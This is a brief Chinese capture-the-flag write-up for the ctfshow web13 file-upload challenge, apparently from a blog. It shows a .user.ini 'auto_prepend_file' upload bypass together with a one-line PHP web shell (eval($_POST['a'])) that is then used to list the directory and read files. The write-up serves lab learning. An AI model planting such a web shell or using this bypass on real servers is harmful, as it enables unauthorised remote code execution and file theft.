ctfshow-web13 文件上传

0x00 前言

0x01 题目

0x02 Write Up

首先看到是一个上传页面,测试其他无果,遂进行目录遍历,发现upload.php.bak文件

可以看到这里的限制条件,大小,以及内容,这里可以使用.user.ini进行上传,具体参考:php user.ini详解

那么我们先上传.user.ini

cpp 复制代码
auto_prepend_file=1.txt

然后上传1.txt,尝试使用get,但是没有生效,这里需要控制字符数量

cpp 复制代码
<?php eval($_POST['a']);

上传好了之后,通过index.php进行访问

首先查看当前目录

然后通过highlight_file读取文件

以上

相关推荐
可怜的Tom被玩弄于股掌之中4 小时前
BUUCTF——ReadlezPHP
安全·web安全·网络安全·网络攻击模型·安全架构
你好我是小美4 小时前
信息收集+初步漏洞打点
安全·web安全·网络安全
weixin_473894775 小时前
Web安全核心内容与常见漏洞总结
安全·web安全
mooyuan天天5 小时前
upload-labs通关笔记-第10关 文件上传之点多重过滤(空格点绕过)
web安全·代码审计·文件上传·文件上传漏洞·upload-labs靶场
Allen_LVyingbo8 小时前
医院网络安全托管服务(MSS)深度解读与实践路径
安全·web安全·健康医疗
玉笥寻珍8 小时前
医疗信息系统安全防护体系的深度构建与理论实践融合
安全·web安全·安全威胁分析·健康医疗
胡耀超13 小时前
探讨零知识证明的数学原理与应用
python·web安全·区块链·密码学·数据安全·零知识证明
James. 常德 student1 天前
网络安全知识点
安全·web安全·php
可怜的Tom被玩弄于股掌之中1 天前
BUUCTF——Nmap
网络·安全·web安全·网络安全
神经毒素1 天前
WEB安全--Java安全--shiro550反序列化漏洞
java·安全·web安全·shiro